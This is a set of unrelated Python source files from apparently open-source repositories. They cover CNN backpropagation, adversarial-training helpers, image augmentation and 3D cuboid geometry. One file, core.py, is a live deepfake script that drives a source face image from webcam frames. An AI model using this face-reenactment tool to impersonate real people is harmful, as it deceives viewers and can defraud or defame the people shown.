if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters[i] = MaxPool2d_params
elif isinstance(layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters[i] = AvgPool2d_params
elif isinstance(layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters[i] = Dropout_params
elif isinstance(layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights[i] = layer.weight
parameters[i] = BatchNorm2d_params
elif isinstance(layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights[i] = layer.weight
parameters[i] = Linear_params
elif isinstance(layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters[i] = AdaptiveAvgPool2d_params
elif isinstance(layer, list):
for j in range(len(layer)):
for k in range(len(layer[j])):
tmp_layer = layer[j][k]
###
if isinstance(tmp_layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = tmp_layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = tmp_layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = Conv2d_params
elif isinstance(tmp_layer, nn.ReLU):
layer_name = 'ReLU'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'Add':
layer_name = 'Add'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'View':
layer_name = 'View'
parameters[i][j][k] = {'layer_name': layer_name}
elif tmp_layer == 'Cat':
layer_name = 'Cat'
parameters[i][j][k] = {'layer_name': layer_name}
elif isinstance(tmp_layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters[i][j][k] = MaxPool2d_params
elif isinstance(tmp_layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = tmp_layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = tmp_layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = tmp_layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters[i][j][k] = AvgPool2d_params
elif isinstance(tmp_layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = tmp_layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters[i][j][k] = Dropout_params
elif isinstance(tmp_layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = tmp_layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = tmp_layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = BatchNorm2d_params
elif isinstance(tmp_layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = tmp_layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = tmp_layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights[i][j][k] = tmp_layer.weight
parameters[i][j][k] = Linear_params
elif isinstance(tmp_layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = tmp_layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters[i][j][k] = AdaptiveAvgPool2d_params
###
else:
print('The layer has not been processed in get_structure_parameters!')
return parameters, fc_conv_weights
def gradient_backward_v2(model, img, label, num_class=1000, g_view=False):
x = Variable(img)
g = generate_g(model, x)
if g_view:
g.view()
delete_allpths(pth_dir=None)
print('\n=========================== Generate Tensors Start ====================================')
result = model(img)
print('=========================== Generate Tensors End ======================================\n')
Loss = nn.CrossEntropyLoss()
if 'GoogLeNet' in str(model).split('\n')[0]:
loss_torch = Loss(result[0], label)
else:
loss_torch = Loss(result, label)
_, connections = generate_connections(g)
last_connections = merge_connections(connections)
return_layers = get_layers(last_connections, model)
return_tensors = get_tensors(last_connections)
parameters, fc_conv_weights = get_structure_parameters(return_layers)
'''
print('================')
for i in range(len(last_connections)):
print(i, last_connections[i])
print('================')
print('================')
for i in range(len(return_layers)):
print(i, return_layers[i])
print('================')
print('================')
for i in range(len(parameters)):
print(i, parameters[i])
print('================')
print('================')
for i in range(len(return_tensors)):
if not isinstance(return_tensors[i], list) and not isinstance(return_tensors[i], str):
print('=========', i, return_tensors[i].shape)
print('================')
'''
import copy
return_dz = copy.deepcopy(last_connections)
featuremap = return_tensors
featuremap.append(img)
y_true = F.one_hot(label, num_classes=num_class).float()
loss, dLoss_dz = cross_entropy_loss(featuremap[0], y_true)
featuremap.pop(0)
return_dz.append(dLoss_dz)
#####################tensors
'''
for i in range(len(last_connections)):
print(last_connections[i])
for i in range(len(featuremap)):
if not isinstance(featuremap[i], list):
print('=========', i, featuremap[i].shape)
else:
for j in range(len(featuremap[i])):
for k in range(len(featuremap[i][j])):
print(' =========', i, j, k, featuremap[i][j][k].shape)
'''
#####################
# 前面n层倒序遍历
for i in range(len(parameters)):
layer = parameters[i]
if not isinstance(layer, list):
print('\n======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.format(layer['layer_name'])+' Backward Start ========================')
if layer['layer_name'] == 'Conv2d':
z = featuremap[i]
weight_z = fc_conv_weights[i]
try:
padding = layer['padding']
except:
padding = (0, 0)
stride = layer['stride']
dLoss_dz, dLoss_dW, dLoss_dB = conv_backward(dLoss_dz, weight_z, z, padding, stride)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'ReLU':
z = featuremap[i]
dLoss_dz = relu_backward(dLoss_dz, z)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'MaxPool2d':
z = featuremap[i]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = max_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'AvgPool2d':
z = featuremap[i]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = average_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Linear':
weight_z = fc_conv_weights[i]
z = featuremap[i]
dLoss_dz, dLoss_dW, dLoss_dB = fc_backward(dLoss_dz, z, weight_z)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'View':
last_z = featuremap[i+1]
if 'Pool' in parameters[i+1]['layer_name']:
params = (parameters[i+1]['kernel_size'], parameters[i+1]['stride'], parameters[i+1]['padding'])
else:
params = None
dLoss_dz = view_backward(dLoss_dz, last_z, params)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Add':
dLoss_dz = add_backward(dLoss_dz)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'Dropout':
if parameters[i-1]['layer_name'] == 'Dropout':
return_dz[i] = dLoss_dz
print('# Skip this layer because the layer has been calcualted!')
print('======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.\
format(layer['layer_name'])+' Backward End ==========================')
continue
p = layer['p']
mask = featuremap[i]
dLoss_dz = dropback_backward(dLoss_dz, mask, p)
return_dz[i] = dLoss_dz
elif layer['layer_name'] == 'BatchNorm2d':
eps = layer['eps']
z = featuremap[i]
gamma = fc_conv_weights[i]
dLoss_dz = batchnorm2d_backward(dLoss_dz, z, eps, gamma)
return_dz[i] = dLoss_dz
print('======================== {0:3} Layer: '.format(str(len(parameters)-1-i))+'{0:11}'.format(layer['layer_name'])+' Backward End ==========================')
elif isinstance(layer, list):
import copy
tmp_dLoss_dz = []
for j in range(len(layer)):
tmp_dLoss_dz.append(copy.deepcopy(dLoss_dz))
for k in range(len(layer[j])):
tmp_layer = layer[j][k]
print('\n=========================== {0:3} Branch: '.format(str(len(parameters)-1-i))+'{0:11}'.format(tmp_layer['layer_name'])+' Backward Start ====================')
if tmp_layer['layer_name'] == 'Conv2d':
if k+1 >= len(featuremap[i-1][j]):
z = featuremap[i]
else:
z = featuremap[i-1][j][k+1]
weight_z = fc_conv_weights[i][j][k]
try:
padding = tmp_layer['padding']
except:
padding = (0, 0)
stride = tmp_layer['stride']
tmp_dLoss_dz[-1], dLoss_dW, dLoss_dB = conv_backward(tmp_dLoss_dz[-1], weight_z, z, padding, stride)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
elif tmp_layer['layer_name'] == 'ReLU':
z = featuremap[i-1][j][k+1]
tmp_dLoss_dz[-1] = relu_backward(tmp_dLoss_dz[-1], z)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
elif tmp_layer['layer_name'] == 'BatchNorm2d':
eps = tmp_layer['eps']
z = featuremap[i-1][j][k+1]
gamma = fc_conv_weights[i][j][k]
tmp_dLoss_dz[-1] = batchnorm2d_backward(tmp_dLoss_dz[-1], z, eps, gamma)
return_dz[i][j][k] = tmp_dLoss_dz[-1]
print('=========================== {0:3} Branch: '.format(str(len(parameters)-1-i))+'{0:11}'.format(tmp_layer['layer_name'])+' Backward End ======================')
print(tmp_dLoss_dz[0].shape, tmp_dLoss_dz[1].shape)
dLoss_dz = tmp_dLoss_dz[0] + tmp_dLoss_dz[1]
else:
print('Not completed in gradient_backward!')
print('# Torch calculated loss: ', loss_torch.detach().numpy())
loss_torch.backward()
if 'VGG' in str(model) or 'AlexNet' in str(model):
print(judge_tensors_equal(dLoss_dW, model.features[0].weight.grad))
elif 'ResNet' in str(model):
print(judge_tensors_equal(dLoss_dW, model.conv1.weight.grad))
delete_allpths(pth_dir=None)
return return_dz, dLoss_dW, dLoss_dB | 2.265625 | 2 |
ark_nlp/factory/utils/attack.py | yubuyuabc/ark-nlp | 1 | 1191 | <gh_stars>1-10
import torch
class FGM(object):
"""
基于FGM算法的攻击机制
Args:
module (:obj:`torch.nn.Module`): 模型
Examples::
>>> # 初始化
>>> fgm = FGM(module)
>>> for batch_input, batch_label in data:
>>> # 正常训练
>>> loss = module(batch_input, batch_label)
>>> loss.backward() # 反向传播,得到正常的grad
>>> # 对抗训练
>>> fgm.attack() # 在embedding上添加对抗扰动
>>> loss_adv = module(batch_input, batch_label)
>>> loss_adv.backward() # 反向传播,并在正常的grad基础上,累加对抗训练的梯度
>>> fgm.restore() # 恢复embedding参数
>>> # 梯度下降,更新参数
>>> optimizer.step()
>>> optimizer.zero_grad()
Reference:
[1] https://zhuanlan.zhihu.com/p/91269728
"""
def __init__(self, module):
self.module = module
self.backup = {}
def attack(
self,
epsilon=1.,
emb_name='word_embeddings'
):
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
self.backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = epsilon * param.grad / norm
param.data.add_(r_at)
def restore(
self,
emb_name='word_embeddings'
):
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.backup
param.data = self.backup[name]
self.backup = {}
class PGD(object):
"""
基于PGD算法的攻击机制
Args:
module (:obj:`torch.nn.Module`): 模型
Examples::
>>> pgd = PGD(module)
>>> K = 3
>>> for batch_input, batch_label in data:
>>> # 正常训练
>>> loss = module(batch_input, batch_label)
>>> loss.backward() # 反向传播,得到正常的grad
>>> pgd.backup_grad()
>>> # 对抗训练
>>> for t in range(K):
>>> pgd.attack(is_first_attack=(t==0)) # 在embedding上添加对抗扰动, first attack时备份param.data
>>> if t != K-1:
>>> optimizer.zero_grad()
>>> else:
>>> pgd.restore_grad()
>>> loss_adv = module(batch_input, batch_label)
>>> loss_adv.backward() # 反向传播,并在正常的grad基础上,累加对抗训练的梯度
>>> pgd.restore() # 恢复embedding参数
>>> # 梯度下降,更新参数
>>> optimizer.step()
>>> optimizer.zero_grad()
Reference:
[1] https://zhuanlan.zhihu.com/p/91269728
"""
def __init__(self, module):
self.module = module
self.emb_backup = {}
self.grad_backup = {}
def attack(
self,
epsilon=1.,
alpha=0.3,
emb_name='emb.',
is_first_attack=False
):
# emb_name这个参数要换成你模型中embedding的参数名
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
if is_first_attack:
self.emb_backup[name] = param.data.clone()
norm = torch.norm(param.grad)
if norm != 0 and not torch.isnan(norm):
r_at = alpha * param.grad / norm
param.data.add_(r_at)
param.data = self.project(name, param.data, epsilon)
def restore(self, emb_name='emb.'):
# emb_name这个参数要换成你模型中embedding的参数名
for name, param in self.module.named_parameters():
if param.requires_grad and emb_name in name:
assert name in self.emb_backup
param.data = self.emb_backup[name]
self.emb_backup = {}
def project(self, param_name, param_data, epsilon):
r = param_data - self.emb_backup[param_name]
if torch.norm(r) > epsilon:
r = epsilon * r / torch.norm(r)
return self.emb_backup[param_name] + r
def backup_grad(self):
for name, param in self.module.named_parameters():
if param.requires_grad:
self.grad_backup[name] = param.grad.clone()
def restore_grad(self):
for name, param in self.module.named_parameters():
if param.requires_grad:
param.grad = self.grad_backup[name]
| 2.875 | 3 |
core.py | sreejithr/deepfake | 0 | 1192 | import cv2
import torch
import yaml
import imageio
import throttle
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
from skimage.transform import resize
from scipy.spatial import ConvexHull
from modules.generator import OcclusionAwareGenerator
from modules.keypoint_detector import KPDetector
from sync_batchnorm import DataParallelWithCallback
#from animate import normalize_kp
# command = [ffmpeg,
# '-y',
# '-f', 'rawvideo',
# '-vcodec','rawvideo',
# '-pix_fmt', 'bgr24',
# '-s', dimension,
# '-i', '-',
# '-c:v', 'libx264',
# '-pix_fmt', 'yuv420p',
# '-preset', 'ultrafast',
# '-f', 'flv',
# 'rtmp://10.10.10.80/live/mystream']
def normalize_kp(kp_source, kp_driving, kp_driving_initial, adapt_movement_scale=False,
use_relative_movement=False, use_relative_jacobian=False):
if adapt_movement_scale:
source_area = ConvexHull(kp_source['value'][0].data.cpu().numpy()).volume
driving_area = ConvexHull(kp_driving_initial['value'][0].data.cpu().numpy()).volume
adapt_movement_scale = np.sqrt(source_area) / np.sqrt(driving_area)
else:
adapt_movement_scale = 1
kp_new = {k: v for k, v in kp_driving.items()}
if use_relative_movement:
kp_value_diff = (kp_driving['value'] - kp_driving_initial['value'])
kp_value_diff *= adapt_movement_scale
kp_new['value'] = kp_value_diff + kp_source['value']
if use_relative_jacobian:
jacobian_diff = torch.matmul(kp_driving['jacobian'], torch.inverse(kp_driving_initial['jacobian']))
kp_new['jacobian'] = torch.matmul(jacobian_diff, kp_source['jacobian'])
return kp_new
def load_checkpoints(config_path, checkpoint_path, cpu=False):
with open(config_path) as f:
config = yaml.load(f)
generator = OcclusionAwareGenerator(**config['model_params']['generator_params'],
**config['model_params']['common_params'])
if not cpu:
generator.cuda()
kp_detector = KPDetector(**config['model_params']['kp_detector_params'],
**config['model_params']['common_params'])
if not cpu:
kp_detector.cuda()
if cpu:
checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))
else:
checkpoint = torch.load(checkpoint_path)
generator.load_state_dict(checkpoint['generator'])
kp_detector.load_state_dict(checkpoint['kp_detector'])
if not cpu:
generator = DataParallelWithCallback(generator)
kp_detector = DataParallelWithCallback(kp_detector)
generator.eval()
kp_detector.eval()
return generator, kp_detector
@throttle.wrap(1, 2)
def forward(source_image, driving_frame, kp_source, kp_driving_initial, generator, kp_detector, relative=True, adapt_scale=True, cpu=True):
kp_driving = kp_detector(driving_frame)
kp_norm = normalize_kp(
kp_source=kp_source,
kp_driving=kp_driving,
kp_driving_initial=kp_driving_initial,
use_relative_movement=relative,
use_relative_jacobian=relative,
adapt_movement_scale=adapt_scale
)
out = generator(source_image, kp_source=kp_source, kp_driving=kp_norm)
return np.transpose(out["prediction"].data.cpu().numpy(), [0, 2, 3, 1])[0]
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--config", required=True, help="path to config")
parser.add_argument("--source_image", required=True, help="path to source image")
parser.add_argument("--checkpoint", default="vox-cpk.pth.tar", help="path to checkpoint")
parser.add_argument("--relative", dest="relative", action="store_true", help="use relative or absolute keypoint coordinates")
parser.add_argument("--adapt_scale", dest="adapt_scale", action="store_true", help="adapt movement scale based on convex hull of keypoints")
parser.add_argument("--cpu", dest="cpu", action="store_true", help="CPU mode")
parser.set_defaults(relative=False)
parser.set_defaults(adapt_scale=False)
opt = parser.parse_args()
generator, kp_detector = load_checkpoints(config_path=opt.config, checkpoint_path=opt.checkpoint, cpu=opt.cpu)
source_image = imageio.imread(opt.source_image)
source_image = resize(source_image, (256, 256))[..., :3]
source = torch.tensor(source_image[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2)
if not opt.cpu:
source = source.cuda()
kp_source = kp_detector(source)
#out = cv2.VideoWriter('outpy.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 30, (256, 256))
kp_driving_initial = None
camera = cv2.VideoCapture(0)
ret, frame = camera.read()
while True:
ret, frame = camera.read()
resized = resize(frame, (256, 256))[..., :3]
if not opt.cpu:
resized = resized.cuda()
# y = torch.tensor(np.array(resized))
# x = y.cpu().numpy()
# image = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)
# # x = y.permute(1, 2, 0)
# plt.imshow(np.array(image))
# plt.show()
driving_resized = torch.tensor(np.array(resized)[np.newaxis].astype(np.float32)).permute(0, 3, 1, 2)
if not kp_driving_initial:
kp_driving_initial = kp_detector(driving_resized)
fake_frame = forward(
source,
driving_resized,
kp_source,
kp_driving_initial,
generator,
kp_detector,
relative=opt.relative,
adapt_scale=opt.adapt_scale,
cpu=opt.cpu
)
cv2.imshow("frame", fake_frame)
#x = np.squeeze(driving_resized, axis=(0,))
#x = driving_resized[0].permute(1, 2, 0)
# plt_driving = driving_resized #permute(2, 3, 1)
#print(plt_driving.shape)
#plt.imshow(x)
#plt.show()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
camera.release()
cv2.destroyAllWindows()
| 1.726563 | 2 |
soupy/approximations/taylor/backup/__init__.py | cpempire/soupy | 1 | 1193 | <reponame>cpempire/soupy<gh_stars>1-10
from __future__ import absolute_import, division, print_function
from .controlPDEProblem import ControlPDEProblem
from .controlPDEProblemMultiPDE import ControlPDEProblemMultiPDE
from .costFunctionalConstant import CostFunctionalConstant
from .costFunctionalConstantMultiPDE import CostFunctionalConstantMultiPDE
from .costFunctionalLinear import CostFunctionalLinear
from .costFunctionalLinearMultiPDE import CostFunctionalLinearMultiPDE
from .costFunctionalQuadratic import CostFunctionalQuadratic
from .costFunctionalQuadraticMultiPDE import CostFunctionalQuadraticMultiPDE
# from .chanceConstraintQuadratic import ChanceConstraintQuadratic
# from .chanceConstraintLinear import ChanceConstraintLinear
# from .chanceConstraintConstant import ChanceConstraintConstant
# to do list
# 0. implement zero, Hessian term
# 1. implement linear
# 2. implement quadratic
# 3. impelement SAA
# to do list
# 1. SAA does not run well in ccgo1, multiprocessor does not work,
### not clear bug, simplifing adjoint solver works
# 2. quadratic approximation does not converge well, even without variance, does not converge
### record eigenvector after m_tr[i].zero()
# 3. check gradient for quadratic + correction
# what to show tomorrow
# 1. variance reduction by mean square error
# 2. trace estimation by MC and randomized SVD
# 3. scaling with repsect to mesh (design + uncertainty), trace, variance reduction, #bfgs
# 4. show the design and state, for both disk and submarine
# 5. random sample and state at different design
# April 9, 2018, work on reporting results
# 1. random samples and states at different design
# 2. table for variance reduction
# 3. plot trace estimation
# 4. plot #bfgs iterations
# obtain all results as planned | 1.578125 | 2 |
models/1-Tom/train/kaggle-hubmap-main/src/02_train/transforms.py | navekshasood/HuBMAP---Hacking-the-Kidney | 0 | 1194 | import numpy as np
from albumentations import (Compose, HorizontalFlip, VerticalFlip, Rotate, RandomRotate90,
ShiftScaleRotate, ElasticTransform,
GridDistortion, RandomSizedCrop, RandomCrop, CenterCrop,
RandomBrightnessContrast, HueSaturationValue, IAASharpen,
RandomGamma, RandomBrightness, RandomBrightnessContrast,
GaussianBlur,CLAHE,
Cutout, CoarseDropout, GaussNoise, ChannelShuffle, ToGray, OpticalDistortion,
Normalize, OneOf, NoOp)
from albumentations.pytorch import ToTensorV2 as ToTensor
from get_config import get_config
config = get_config()
MEAN = np.array([0.485, 0.456, 0.406])
STD = np.array([0.229, 0.224, 0.225])
def get_transforms_train():
transform_train = Compose([
#Basic
RandomRotate90(p=1),
HorizontalFlip(p=0.5),
#Morphology
ShiftScaleRotate(shift_limit=0, scale_limit=(-0.2,0.2), rotate_limit=(-30,30),
interpolation=1, border_mode=0, value=(0,0,0), p=0.5),
GaussNoise(var_limit=(0,50.0), mean=0, p=0.5),
GaussianBlur(blur_limit=(3,7), p=0.5),
#Color
RandomBrightnessContrast(brightness_limit=0.35, contrast_limit=0.5,
brightness_by_max=True,p=0.5),
HueSaturationValue(hue_shift_limit=30, sat_shift_limit=30,
val_shift_limit=0, p=0.5),
CoarseDropout(max_holes=2,
max_height=config['input_resolution'][0]//4, max_width=config['input_resolution'][1]//4,
min_holes=1,
min_height=config['input_resolution'][0]//16, min_width=config['input_resolution'][1]//16,
fill_value=0, mask_fill_value=0, p=0.5),
Normalize(mean=(MEAN[0], MEAN[1], MEAN[2]),
std=(STD[0], STD[1], STD[2])),
ToTensor(),
])
return transform_train
def get_transforms_valid():
transform_valid = Compose([
Normalize(mean=(MEAN[0], MEAN[1], MEAN[2]),
std=(STD[0], STD[1], STD[2])),
ToTensor(),
] )
return transform_valid
def denormalize(z, mean=MEAN.reshape(-1,1,1), std=STD.reshape(-1,1,1)):
return std*z + mean
| 1.851563 | 2 |
cubspack/geometry.py | Majikat/cubspack | 11 | 1195 | <gh_stars>10-100
# -*- coding: utf-8 -*-
from math import sqrt
class Point(object):
__slots__ = ('x', 'y', 'z')
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.z == other.z)
def __repr__(self):
return "P({}, {}, {})".format(self.x, self.y, self.z)
def distance(self, point):
"""Calculate distance to another point"""
return sqrt((self.x - point.x)**2 + (self.y - point.y)**2 + (
self.z - point.z)**2)
def distance_squared(self, point):
return (self.x - point.x)**2 + (self.y - point.y)**2 + (
self.z - point.z)**2
class Segment(object):
__slots__ = ('start', 'end')
def __init__(self, start, end):
"""Arguments:
start (Point): Segment start point
end (Point): Segment end point
"""
assert(isinstance(start, Point) and isinstance(end, Point))
self.start = start
self.end = end
def __eq__(self, other):
if not isinstance(other, self.__class__):
None
return self.start == other.start and self.end == other.end
def __repr__(self):
return "S({}, {})".format(self.start, self.end)
@property
def length_squared(self):
"""Faster than length and useful for some comparisons"""
return self.start.distance_squared(self.end)
@property
def length(self):
return self.start.distance(self.end)
@property
def top(self):
return max(self.start.y, self.end.y)
@property
def bottom(self):
return min(self.start.y, self.end.y)
@property
def right(self):
return max(self.start.x, self.end.x)
@property
def left(self):
return min(self.start.x, self.end.x)
@property
def ineye(self):
return max(self.start.z, self.end.z)
@property
def outeye(self):
return min(self.start.z, self.end.z)
class HSegment(Segment):
"""Horizontal Segment"""
def __init__(self, start, length):
"""Create an Horizontal segment given its left most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
super(HSegment, self).__init__(
start, Point(start.x + length, start.y, start.z))
@property
def length(self):
return self.end.x - self.start.x
class VSegment(Segment):
"""Vertical Segment"""
def __init__(self, start, length):
"""Create a Vertical segment given its bottom most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
super(VSegment, self).__init__(
start, Point(start.x, start.y + length, start.z))
@property
def length(self):
return self.end.y - self.start.y
class DSegment(Segment):
"""In-Depth Segment"""
def __init__(self, start, length):
"""Create an In-Depth segment given its bottom most end point and its length.
Arguments:
- start (Point): Starting Point
- length (number): segment length
"""
assert(isinstance(start, Point) and not isinstance(length, Point))
super(VSegment, self).__init__(
start, Point(start.x, start.y, start.z + length))
@property
def length(self):
return self.end.z - self.start.z
class Cuboid(object):
"""Basic cuboid primitive class.
x, y, z-> Lower right corner coordinates
width -
height -
depth -
"""
__slots__ = ('width', 'height', 'depth', 'x', 'y', 'z', 'rid')
def __init__(self, x, y, z, width, height, depth, rid=None):
"""Initiating the Cuboid
Args:
x (int, float):
y (int, float):
z (int, float):
width (int, float):
height (int, float):
depth (int, float):
rid (identifier object):
"""
assert(height >= 0 and width >= 0 and depth >= 0)
self.width = width
self.height = height
self.depth = depth
self.x = x
self.y = y
self.z = z
self.rid = rid
@property
def bottom(self):
"""Cuboid bottom edge y coordinate"""
return self.y
@property
def top(self):
"""Cuboid top edge y coordiante"""
return self.y + self.height
@property
def left(self):
"""Cuboid left edge x coordinate"""
return self.x
@property
def right(self):
"""Cuboid right edge x coordinate"""
return self.x + self.width
@property
def outeye(self):
"""Cuboid farther from eye edge z coordinate"""
return self.z
@property
def ineye(self):
"""Cuboid nearer from eye edge z coordinate"""
return self.z + self.depth
@property
def corner_top_l(self):
return Point(self.left, self.top, self.outeye)
@property
def corner_top_r(self):
return Point(self.right, self.top, self.outeye)
@property
def corner_bot_r(self):
return Point(self.right, self.bottom, self.outeye)
@property
def corner_bot_l(self):
return Point(self.left, self.bottom, self.outeye)
@property
def corner_top_l_out(self):
return Point(self.left, self.top, self.ineye)
@property
def corner_top_r_out(self):
return Point(self.right, self.top, self.ineye)
@property
def corner_bot_r_out(self):
return Point(self.right, self.bottom, self.ineye)
@property
def corner_bot_l_out(self):
return Point(self.left, self.bottom, self.ineye)
def __lt__(self, other):
"""Compare cuboids by volume (used for sorting)"""
return self.volume() < other.volume()
def __eq__(self, other):
"""Equal cuboids have same properties."""
if not isinstance(other, self.__class__):
return False
return (self.width == other.width and
self.height == other.height and
self.depth == other.depth and
self.x == other.x and
self.y == other.y and
self.z == other.z)
def __hash__(self):
return hash(
(self.x, self.y, self.z, self.width, self.height, self.depth))
def __iter__(self):
"""Iterate through cuboid corners"""
yield self.corner_top_l
yield self.corner_top_r
yield self.corner_bot_r
yield self.corner_bot_l
yield self.corner_top_l_out
yield self.corner_top_r_out
yield self.corner_bot_r_out
yield self.corner_bot_l_out
def __repr__(self):
return "R({}, {}, {}, {}, {}, {})".format(
self.x, self.y, self.z, self.width, self.height, self.depth)
def volume(self):
"""Cuboid volume"""
return self.width * self.height * self.depth
def move(self, x, y, z):
"""Move Cuboid to x,y,z coordinates
Arguments:
x (int, float): X coordinate
y (int, float): Y coordinate
